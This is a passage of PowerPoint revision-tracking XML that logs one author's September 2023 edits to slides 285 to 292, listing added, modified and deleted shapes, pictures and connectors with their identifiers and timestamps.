          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:32:19.784" v="8786" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:spMk id="31" creationId="{B39B77C2-31E8-07D6-EF84-921A601D466E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:33:11.695" v="8833" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:spMk id="32" creationId="{6843102A-F51B-CAD4-C30E-44740071002F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:34:39.749" v="8912" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:spMk id="33" creationId="{AB1C8965-531B-ADFA-9F90-55EB18750511}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:34:59.124" v="8938" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:spMk id="34" creationId="{93A18B92-965A-6F03-FBAB-1D92989E135F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-18T19:40:01.077" v="5754" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:spMk id="1031" creationId="{362D44EE-C852-4460-B8B5-C4F2BC20510C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-18T19:40:01.077" v="5754" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:spMk id="1033" creationId="{658970D8-8D1D-4B5C-894B-E871CC86543D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-18T19:40:01.077" v="5754" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:spMk id="1035" creationId="{F227E5B6-9132-43CA-B503-37A18562ADF2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-18T19:40:01.077" v="5754" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:spMk id="1037" creationId="{03C2051E-A88D-48E5-BACF-AAED17892722}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-18T19:40:01.077" v="5754" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:spMk id="1039" creationId="{7821A508-2985-4905-874A-527429BAABFA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-18T19:40:01.077" v="5754" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:spMk id="1041" creationId="{D2929CB1-0E3C-4B2D-ADC5-0154FB33BA44}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-18T19:40:01.077" v="5754" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:spMk id="1043" creationId="{5F2F0C84-BE8C-4DC2-A6D3-30349A801D5C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-18T19:48:06.575" v="5788" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:picMk id="5" creationId="{A43E9382-539D-6D61-9DC2-FC3DE4303504}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:25:52.155" v="8701" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:picMk id="7" creationId="{5F99A620-6D40-B018-CE88-653DB6F23F7A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:17:57.075" v="8613" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:picMk id="8" creationId="{A6C0E459-1A11-2B08-6A97-A96D1BBB358A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:27:41.585" v="8715" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:picMk id="9" creationId="{2B9FA8C6-8E9A-B4F8-F741-A8EA8535E555}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:25:52.155" v="8701" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:picMk id="10" creationId="{49CF214E-4F73-9779-1164-B3E1981EAAF3}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:25:52.155" v="8701" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:picMk id="11" creationId="{9FF93EB4-E8A6-64F9-C572-6AD42B8CBB70}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:30:40.479" v="8733" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:picMk id="29" creationId="{9072A050-BB75-3452-CF8E-D395C4BFB7F0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-18T19:40:03.217" v="5755"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:picMk id="1026" creationId="{D9764547-499B-51C6-3842-E82786AAE0E3}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:27:41.585" v="8715" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:picMk id="1026" creationId="{DBC0B58A-19E6-8814-CA04-193AAF8723E9}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:18:17.384" v="8618" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:picMk id="1028" creationId="{4B840082-2704-503A-456D-002C6BA66E26}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-18T19:40:12.961" v="5757"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:picMk id="1028" creationId="{68C468D3-45CB-244A-08D8-8E37C83557F8}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:22:58.308" v="8651" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:picMk id="1030" creationId="{E05FF02C-64AF-A83D-2235-85468F4A7010}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:10:53.601" v="8545" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:picMk id="1032" creationId="{E90D55ED-B80E-4F88-076A-CD6F66AAA5DF}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:27:41.585" v="8715" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:picMk id="1034" creationId="{578ACCB4-1AA9-1EDA-AD08-206C0C629A95}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-18T19:46:55.715" v="5784"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:picMk id="1034" creationId="{EB983C5E-54D8-2773-6A40-754C8E0C6A5D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:23:34.902" v="8653"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:picMk id="1036" creationId="{C9F56F95-E097-C502-62CD-AC7B380D04B5}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:25:52.155" v="8701" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:picMk id="1038" creationId="{BBBF8A1F-2206-743F-2A8B-A95AB86D2270}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:27:41.585" v="8715" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:picMk id="1040" creationId="{51C4556D-4237-DD70-EED8-E6B60D282497}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:29:25.205" v="8720" actId="208"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:cxnSpMk id="18" creationId="{C6D96C4E-08D3-214C-437D-EBC03326DE9C}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:29:47.366" v="8723" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:cxnSpMk id="20" creationId="{6C85CEB8-D50C-CCD1-1786-25B00DFE0FCB}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:30:03.310" v="8727" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:cxnSpMk id="22" creationId="{1ECCF361-6E38-594D-1C73-A4EE72C8F79D}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:30:34.818" v="8731" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3231220531" sldId="285"/>
            <ac:cxnSpMk id="25" creationId="{5862B978-9EDC-1B23-3786-94547B474061}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add mod ord">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T01:55:01.068" v="7908" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3372465715" sldId="286"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T01:54:26.778" v="7891" actId="108"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372465715" sldId="286"/>
            <ac:spMk id="2" creationId="{8D9926A0-03BF-4D5F-8529-DF8AAAB6E007}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T01:55:01.068" v="7908" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372465715" sldId="286"/>
            <ac:spMk id="3" creationId="{1B053F55-BE90-DC80-CA1E-5339E65959B9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-18T20:03:05.241" v="5799" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372465715" sldId="286"/>
            <ac:spMk id="10" creationId="{D4D68565-41A7-E4F3-F85C-6AC672051F50}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-18T20:03:16.185" v="5805" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372465715" sldId="286"/>
            <ac:spMk id="14" creationId="{BA450E52-C3C5-74D3-D194-B4F10BF6CCC1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T00:01:45.246" v="6464" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372465715" sldId="286"/>
            <ac:picMk id="5" creationId="{DAB01823-D7F6-7945-7A1B-78960BF4AB0E}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-18T20:03:10.192" v="5803" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372465715" sldId="286"/>
            <ac:picMk id="7" creationId="{C55EA1EF-EA4A-A76A-FEDC-10E9CD767672}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-18T20:03:11.088" v="5804" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372465715" sldId="286"/>
            <ac:picMk id="8" creationId="{3B5B821C-F66A-4CD4-8DF1-9A75002DD0C7}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-18T20:03:09.537" v="5802" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3372465715" sldId="286"/>
            <ac:cxnSpMk id="12" creationId="{FB70DBF6-5B54-0726-C629-030C323CF3CA}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new del mod setBg modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-18T20:42:52.290" v="6265" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3340593606" sldId="287"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-18T20:20:38.915" v="5990" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3340593606" sldId="287"/>
            <ac:spMk id="2" creationId="{AA09E538-3226-C577-7873-8B4DB49B7E99}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-18T20:20:38.915" v="5990" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3340593606" sldId="287"/>
            <ac:spMk id="3" creationId="{0E486B88-3C3F-B659-AFED-81C36D8B1185}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-18T20:20:44.948" v="5992" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3340593606" sldId="287"/>
            <ac:spMk id="4" creationId="{6AD3A441-A7B5-DCEB-73C8-4AD846DAE5F4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-18T20:20:44.948" v="5992" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3340593606" sldId="287"/>
            <ac:spMk id="5" creationId="{AD33779A-D61D-CF10-E9E5-EB08F72CB6D9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-18T20:20:44.948" v="5992" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3340593606" sldId="287"/>
            <ac:spMk id="10" creationId="{081EA652-8C6A-4E69-BEB9-170809474553}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-18T20:20:44.948" v="5992" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3340593606" sldId="287"/>
            <ac:spMk id="12" creationId="{5298780A-33B9-4EA2-8F67-DE68AD62841B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-18T20:20:44.948" v="5992" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3340593606" sldId="287"/>
            <ac:spMk id="14" creationId="{7F488E8B-4E1E-4402-8935-D4E6C02615C7}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T20:23:07.104" v="11431" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3745973497" sldId="288"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-18T21:02:37.422" v="6267" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3745973497" sldId="288"/>
            <ac:spMk id="2" creationId="{A0B49476-29B8-7DF3-B98C-022B0A659AA3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T20:23:07.104" v="11431" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3745973497" sldId="288"/>
            <ac:spMk id="3" creationId="{08F7FDB9-23C3-FA29-AD53-DEFB6FF6F0C9}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del mod ord">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T00:23:21.656" v="6886" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="136385245" sldId="289"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-18T23:55:40.636" v="6386" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="136385245" sldId="289"/>
            <ac:spMk id="3" creationId="{C89ECC1F-0F8A-9730-15FF-596ABA9AD629}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new del mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T00:26:49.797" v="6994" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="886062086" sldId="290"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T00:13:22.700" v="6678" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="886062086" sldId="290"/>
            <ac:spMk id="2" creationId="{CBA7487F-A93B-F920-005B-3856FD870109}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T00:26:50.628" v="6995" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3637384669" sldId="291"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod ord">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T01:26:12.035" v="7550" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2120195576" sldId="292"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
